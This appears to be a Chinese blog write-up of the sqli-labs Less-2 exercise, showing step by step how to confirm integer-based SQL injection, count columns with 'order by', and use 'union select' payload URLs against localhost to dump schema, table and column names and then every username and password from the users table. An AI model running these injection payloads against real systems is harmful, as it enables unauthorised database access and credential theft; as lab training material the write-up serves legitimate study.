1. 程式人生 > 實用技巧 >sqli-lbs-2 GET - Error based - Intiger based (基於錯誤的GET整型注入)

sqli-lbs-2 GET - Error based - Intiger based (基於錯誤的GET整型注入)

知識點:1,判斷是數字型還是字元型,單引號還是雙引號
2,union select聯合查詢注入
3,payload原理與防禦措施

這道題與上道題的主要區別就是這個是整型,即這個題的id引數沒有引號,只是數字,這意味著在你繞過的時候可以不需要對後面的引號過濾(如果沒有其他干擾的話)
大概步驟:1.輸入?id=2-1頁面資訊發生變化,說明此處是數值型注入
2.order by 3 頁面顯示正常,order by 4頁面顯示不正常,所以該表有3列資料
3.接著可以使用聯合查詢進行注入,詳細過程參考第一關

接下來進行操作: 輸入 ?id=2-1
在這裡插入圖片描述接下來進行回顯操作,先 order by 3 再 order by 4

在這裡插入圖片描述在這裡插入圖片描述輸入4時錯誤,所以判斷只有三列資料,判斷完後我們就可以進行聯合查詢了,操作同第一關:
http://localhost/Less-2/?id=666 union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+
在這裡插入圖片描述http://localhost/Less-2/?id=666 union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)–+
在這裡插入圖片描述
http://localhost/Less-2/?id=666 union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(column_name) from information_schema.columns where table_name=‘users’)–+
在這裡插入圖片描述http://localhost/Less-2/?id=666 union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(username) from security.users)–+
在這裡插入圖片描述
http://localhost/Less-2/?id=666 union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(password) from security.users)–+

在這裡插入圖片描述至此,所有的使用者名稱和密碼就都出來啦,嘻嘻